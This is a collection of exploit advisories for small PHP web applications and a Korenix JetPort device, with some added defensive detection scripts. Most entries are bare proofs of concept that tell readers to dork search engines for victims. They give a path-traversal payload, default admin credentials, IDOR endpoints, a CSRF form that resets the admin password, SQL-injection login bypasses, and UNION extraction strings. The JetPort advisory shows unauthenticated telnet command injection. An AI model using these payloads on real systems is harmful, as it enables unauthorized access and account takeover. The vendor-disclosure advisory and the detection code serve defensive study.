<pre><code>=============================================================================================================================================<br />| # Title : E-Commerce Site using PHP PDO v1.0 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/12287/e-commerce-site-using-php-pdo.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] use payload : /bower_components/bootstrap/dist/css/../../Gemfile<br /><br />[+] https://www/127.0.0.1/demo/site/login<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Covid-19 Directory on Vaccination System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Bhojon Restaurant Management System v2.8 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Direct Object Reference : the application suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /dashboard/autoupdate<br /><br />[+] https://www/127.0.0.1/tacoturkco/dashboard/autoupdate<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Khanepani v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to line 5, set the target site link, save the changes and apply.<br /><br />[+] infected file : cms/user/modify.php<br /><br />[+] save code as poc.html<br /><br />[+] payload :<br /><br /><html><head><title>User Edit</title></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type='password' class="form-control" name='password' id='password' value="123456"><br /> </div><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="active" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> </div><br /> <div style='height:80px'><br /> <input type='submit' value='Submit'><input type='reset' value='Reset'><br /> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Cop v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.<br /><br />[+] use payload : cms/gallery/insert.php<br /><br />[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz v1.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.<br /><br />[+] use payload : cms/gallery/insert.php<br /><br />[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>CyberDanube Security Research 20240805-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities in JetPort Series<br /> product| Korenix JetPort Series<br /> vulnerable version| 1.2<br /> fixed version| None<br /> CVE number| CVE-2024-7395, CVE-2024-7396, CVE-2024-7397<br /> impact| High<br /> homepage| https://www.korenix.com/<br /> found| 2024-04-01<br /> by| S. Dietz (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />With decades of experiences in the industry, we have developed various product<br />lines [...].<br /><br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners. [...]"<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />Korenix JetPort 5601v3 / v1.2<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Insufficient Authentication (CVE-2024-7395)<br />The configuration service on port 600/tcp doesn't require authentication to be<br />used. 
This allows an attacker to change the password or other critical<br />information.<br /><br />2) Plaintext Communication (CVE-2024-7396)<br />The configuration service communicates in plain text.<br />An attacker could use this to sniff passwords or other critical<br />information.<br /><br />3) Unauthenticated Command Injection (CVE-2024-7397)<br />An attacker with network access can execute arbitrary commands as root user<br />via the management service on port 600/tcp.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Insufficient Authentication (CVE-2024-7395)<br />The management software JetPort Commander is used as a frontend for the telnet<br />service on 600/tcp. While it is possible to set a password, the password gets<br />sent to the software in cleartext and gets validated in the client software<br />rather than on the device. An attacker can bypass the management software by<br />using telnet to connect directly to the port. This allows them to reconfigure<br />the device, including passwords and access controls.<br /><br />$ telnet 192.168.122.76 600<br />Trying 192.168.122.76...<br />Connected to 192.168.122.76.<br />Escape character is '^]'.<br />-> setpassword poc<br /><br />target:/$ cat /tmp/com2ip.conf<br />version:1.2.0<br />model:JetPort5601v3<br />name:JetPort5601v3-DEFAULT<br />serialno:0000000000000000<br />password:poc<br />switchmode:redundant<br />network:static:192.168.122.76:192.168.10.1:192.168.10.1<br /><br /><br />2) Plaintext Communication (CVE-2024-7396)<br />The management service uses telnet as its protocol. We used tcpdump to inspect the<br />traffic during a password change. 
The new password (newpass) is readable during<br />transmission.<br /><br /># sudo tcpdump -i virbr0 dst port 600 -X<br />14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21<br />      0x0000: 4500 003d 16a7 4000 8006 6d86 c0a8 7af0 E..=..@...m...z.<br />      0x0010: c0a8 7a4c c1c0 0258 522b 6096 12eb 337d ..zL...XR+`...3}<br />      0x0020: 5018 4026 76bd 0000 7365 7470 6173 7377 P.@&v...setpassw<br />      0x0030: 6f72 6420 6e65 7770 6173 730d 0a ord.newpass..<br /><br /><br />3) Unauthenticated Remote Code Execution (CVE-2024-7397)<br />The management service on port 600/tcp is used to configure JetPort devices<br />over the network. An attacker can inject arbitrary commands in multiple<br />settings options. The binary ser2net receives the data via the telnet<br />protocol and translates it to arguments for system() calls. For our PoC we<br />used the setsntp option to create the file /tmp/pwned.<br /><br />$ telnet 192.168.122.76 600<br />Trying 192.168.122.76...<br />Connected to 192.168.122.76.<br />Escape character is '^]'.<br />-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1<br />OK<br />-><br /><br />target:/$ ls -rtlha /tmp/<br />drwxrwxr-x 17 root 0 1.0k Apr 4 10:41 ..<br />-rw-r--r-- 1 root 0 4 Apr 4 12:28 thttpd.pid<br />-rw-r--r-- 1 root 0 712 Apr 4 12:29 com2ip.conf<br />-rw-r--r-- 1 root 0 0 Apr 4 12:33 pwned<br />-------------------------------------------------------------------------------<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />None. 
Device is End-of-Life.<br /><br /><br />Workaround<br />-------------------------------------------------------------------------------<br />Limit access to the device and place it within a segmented network.<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends that Korenix customers remove the device from their<br />network topology.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.<br />2024-05-07: Received confirmation that the issue is being looked into.<br />2024-06-10: Contact stated that the product is considered EoL and will no<br /> longer receive security updates.<br />2024-06-10: Confirmed receipt and told them that we will publish the<br /> advisory after our 90-day deadline.<br />2024-08-05: Publication of the Advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF Sebastian Dietz / @2024<br /><br /></code></pre>
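The advisory above shows the cleartext setpassword command in a tcpdump -X hex dump and a command injection through the setsntp argument. The following Python is an added example and not part of the CyberDanube advisory: it reassembles the packet bytes from that hex dump, walks the IPv4/TCP headers to the telnet payload, and raises alerts for any command to 600/tcp (the service is unauthenticated), for cleartext password changes, and for shell metacharacters in command arguments. Function names and alert texts are my own; the sample capture is the one quoted in the advisory.

```python
import re
from dataclasses import dataclass

# Constructed sample: the tcpdump -X capture quoted in the advisory, one TCP
# segment to 600/tcp carrying the cleartext "setpassword newpass" command.
SAMPLE_DUMP = """\
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21
      0x0000: 4500 003d 16a7 4000 8006 6d86 c0a8 7af0 E..=..@...m...z.
      0x0010: c0a8 7a4c c1c0 0258 522b 6096 12eb 337d ..zL...XR+`...3}
      0x0020: 5018 4026 76bd 0000 7365 7470 6173 7377 P.@&v...setpassw
      0x0030: 6f72 6420 6e65 7770 6173 730d 0a ord.newpass..
"""

HEX_ROW = re.compile(r"^\s*0x[0-9a-fA-F]{4}:\s+(.*)$")
HEX_GROUP = re.compile(r"[0-9a-fA-F]{2}(?:[0-9a-fA-F]{2})?")
# Characters that let an argument escape a system() command string.
SHELL_META = re.compile(rb"[;&|`$<>(){}\n]")

def parse_tcpdump_hex(dump: str) -> bytes:
    """Reassemble raw packet bytes from a `tcpdump -X` hex dump."""
    raw = bytearray()
    for line in dump.splitlines():
        m = HEX_ROW.match(line)
        if not m:
            continue  # packet summary line, no hex on it
        for tok in m.group(1).split()[:8]:  # a row holds at most 8 hex groups
            if not HEX_GROUP.fullmatch(tok):
                break  # reached the printable-ASCII column (assumed not hex-like)
            raw += bytes.fromhex(tok)
    return bytes(raw)

@dataclass
class TcpData:
    dst_port: int
    payload: bytes

def tcp_payload(pkt: bytes) -> TcpData:
    """Skip the IPv4 and TCP headers (honouring IHL and data offset) to the data."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        raise ValueError("expected an IPv4/TCP packet")
    ihl = (pkt[0] & 0x0F) * 4
    total_len = int.from_bytes(pkt[2:4], "big")
    tcp = pkt[ihl:total_len]
    data_off = (tcp[12] >> 4) * 4
    return TcpData(int.from_bytes(tcp[2:4], "big"), tcp[data_off:])

def classify(seg: TcpData) -> list:
    """Alerts for JetPort management traffic: everything on 600/tcp is unauthenticated."""
    if seg.dst_port != 600:
        return []
    verb, _, args = seg.payload.strip().partition(b" ")
    alerts = [f"unauthenticated management command {verb.decode(errors='replace')!r} (CVE-2024-7395)"]
    if verb.lower() == b"setpassword":
        alerts.append("password sent in cleartext on 600/tcp (CVE-2024-7396)")
    if SHELL_META.search(args):
        alerts.append("shell metacharacters in command argument, possible injection (CVE-2024-7397)")
    return alerts
```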
<pre><code>## Title: eduAuthorities-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 07/29/2024<br />## Vendor: https://www.mayurik.com/<br />## Software:<br />https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The editid parameter appears to be vulnerable to SQL injection attacks. The<br />payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each<br />submitted in the editid parameter. These two requests resulted in different<br />responses, indicating that the input is being incorporated into a SQL query<br />in an unsafe way. Note that automated difference-based tests for SQL<br />injection flaws can often be unreliable and are prone to false positive<br />results. You should manually review the reported requests and responses to<br />confirm whether a vulnerability is actually present.<br />Additionally, the payload (select*from(select(sleep(20)))a) was submitted<br />in the editid parameter. 
The application took 20011 milliseconds to respond<br />to the request, compared with 3 milliseconds for the original request,<br />indicating that the injected SQL command caused a time delay. The attacker<br />can get all information from the system by using this vulnerability!<br /><br />STATUS: HIGH - Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: #1* (URI)<br /> Type: boolean-based blind<br /> Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (EXTRACTVALUE)<br /> Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488<br />OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#<br />UiVZfrom(select(sleep(3)))a)<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 3 columns<br /> Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962<br />UNION ALL SELECT<br />8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/eduauthorities-1-109562178)<br /><br />## More:<br />[href](<br />https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
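The post above describes three indicators: a pair of boolean probes that produce different responses, a sleep() probe whose delay shows up in the response time (20011 ms against 3 ms), and UNION/EXTRACTVALUE extraction. The Python below is an added example, not part of the nu11secur1ty post, that turns those indicators into a log check. It assumes a constructed access-log format of `path?query status response_ms` and that editid should only ever be a numeric id.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines: "<path?query> <status> <response_ms>". The
# probes mirror the advisory: boolean pair, sleep(20) delay, UNION extraction.
SAMPLE_LOG = """\
/eduauth/edit-class-detail.php?editid=12 200 3
/eduauth/edit-class-detail.php?editid=15750083%20or%204189%3D04189 200 4
/eduauth/edit-class-detail.php?editid=58006253%20or%207709%3D7710 200 4
/eduauth/edit-class-detail.php?editid=(select*from(select(sleep(20)))a) 200 20011
/eduauth/edit-class-detail.php?editid=-2962%20UNION%20ALL%20SELECT%208651,8651,8651%23 200 5
"""

BOOLEAN = re.compile(r"\b(or|and)\b\s+(\d+)\s*=\s*(\d+)", re.I)
TIME_DELAY = re.compile(r"\bsleep\s*\(\s*(\d+)\s*\)", re.I)
UNION_OR_ERROR = re.compile(r"\b(union\s+all\s+select|union\s+select|extractvalue\s*\()", re.I)

def inspect_request(line: str) -> dict:
    """Parse one log line; return the decoded editid, timing and SQLi indicators."""
    url, _status, ms = line.rsplit(" ", 2)
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    editid = query.get("editid", [""])[0]  # parse_qs already percent-decodes
    ms = int(ms)
    findings = []
    if not re.fullmatch(r"\d+", editid):
        findings.append("non-numeric editid")  # the parameter should be an integer id
    m = BOOLEAN.search(editid)
    if m:
        kind = "true" if int(m.group(2)) == int(m.group(3)) else "false"
        findings.append(f"boolean-blind probe (always-{kind} condition)")
    m = TIME_DELAY.search(editid)
    if m and ms >= int(m.group(1)) * 1000:  # delay actually observed, not just requested
        findings.append(f"time-based blind: sleep({m.group(1)}) and response took {ms} ms")
    if UNION_OR_ERROR.search(editid):
        findings.append("UNION/EXTRACTVALUE extraction attempt")
    return {"editid": editid, "ms": ms, "findings": findings}

def scan_log(text: str) -> list:
    """Return the inspected requests that carry at least one indicator."""
    rows = (inspect_request(l) for l in text.splitlines() if l.strip())
    return [r for r in rows if r["findings"]]
```

Comparing a boolean pair across two requests (as the post does) needs both responses; the per-line check above flags the always-true/always-false shape of each probe so the pair can be correlated afterwards.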
<pre><code>======================================================================================================================================================<br />| # Title : Concert Ticket Reservation System v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Concert_Ticket_Ordering_System__IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />======================================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/ConcertTicketReservationSystem-master/profile.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Settings : appears to leave a default administrative account in place post installation.<br /><br />[+] use payload : user = admin & pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>